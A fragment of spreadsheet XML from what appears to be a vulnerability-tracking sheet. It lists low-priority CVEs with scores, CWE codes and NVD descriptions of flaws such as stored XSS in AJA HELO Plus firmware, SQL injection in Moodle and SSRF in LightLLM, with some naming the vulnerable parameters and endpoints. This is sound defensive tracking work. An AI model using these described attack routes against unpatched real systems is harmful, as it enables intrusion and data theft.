        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>AJA HELO Plus firmware before 2.1.7 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers with network access to inject malicious JavaScript by setting an unsanitized eParamID_SystemName value through the /config?action=set web configuration API. Attackers can exploit this flaw when device authentication is disabled to persistently execute arbitrary script in the browser of any administrator who opens the web management interface, enabling theft of stored secrets such as web UI credentials, RTMP stream keys, publish URLs, and NFS/SMB share credentials, as well as hijacking of the authenticated session.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47096</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47518</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in a secure microcontroller component, where incorrect permission assignment for a critical resource allows an attacker with privileged local access to modify protected memory that should be restricted. A successful exploit of this vulnerability might lead to code execution and escalation of privileges.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47518</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100267</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 reDoS attack was possible via mailbox regex mail-rule filters</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100267</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100276</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 guest users could remove a workflow action's visibility restriction and run the action</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100276</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102110</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-670</t>
        </is>
      </c>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>An endpoint used during initial appliance setup did not require authentication and did not correctly enforce its intended state precondition, so during the initial activation window an unauthenticated network attacker could repeatedly re-trigger the privileged activation process. This could disrupt setup and leave the appliance in an incompletely configured state. The issue is only reachable while an appliance is being activated for the first time and not yet fully configured.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102110</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102384</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>Author Cross Site Scripting (XSS) in Supreme Modules Lite &lt;= 2.5.63 versions.</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102384</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55174</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>UltrafastSecp256k1 is a high-performance, multi-backend secp256k1 engine with reproducible audit evidence, compatibility shims, and profile-based review scopes. Prior to version 4.2.0, UltrafastSecp256k1's ECDSA adaptor pre-signature verification accepts forged adaptor pre-signatures whose "r" value is not cryptographically bound to the adaptor point "T". This issue has been patched in version 4.2.0.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55174</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76147</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-807, CWE-862</t>
        </is>
      </c>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>A path traversal (ZIP Slip) vulnerability caused by insufficient authorization and integrity verification in the agent upgrade feature of Genian NAC/ZTNA allows a remote attacker to execute arbitrary code</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76147</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94681</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Denial of Service Attack in WP Store Locator &lt; 3.0.0 versions.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94681</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103243</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 fails to validate image_url and audio_url parameters in multimodal endpoints, allowing unauthenticated attackers to perform server-side request forgery. Attackers can supply arbitrary URLs to fetch internal resources, with vision model processing disclosing content or error responses revealing internal network topology.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103243</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103397</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>OpenSave before 2.4.0-beta.1 fails to validate sender identity in WAN relay requests, allowing unpaired room members to impersonate paired devices by spoofing the RelayMessage From field. Attackers who know the room code can join, read paired peer identifiers from announcements, and send forged requests to access protected sync routes including save data, snapshots, and file operations.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103397</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102578</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="inlineStr"/>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. An authenticated attacker with access to the question bank web service can submit unsanitized input directly into database queries, resulting in a SQL (Structured Query Language) injection vulnerability. This issue could allow an attacker to view, alter, or delete sensitive data stored in the underlying database.</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102578</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103230</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="inlineStr"/>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. Impacted is the function mysqli_query of the file User/ord.php of the component Order Placement. Executing a manipulation of the argument id/name can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103230</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103232</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This affects the function mysqli_query of the file admin/table_booking.php. This manipulation of the argument Name causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103232</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103531</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in OpenSC up to 0.27.1. The impacted element is the function setcos_construct_fci_44 of the file src/libopensc/card-setcos.c. Executing a manipulation of the argument type_attr can lead to stack-based buffer overflow. The attack can be launched remotely. This patch is called ad730304052937c32b4eb489a06835ac6123632c. It is best practice to apply a patch to resolve this issue.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103531</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103641</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GEGL. The Radiance HDR loader reads past the end of a memory-mapped image when an uncompressed scanline is shorter than the width declared in the file header. Opening a crafted HDR file crashes the application that uses the loader.</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103641</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47492</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where an attacker can cause improper access control. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47492</t>
        </is>
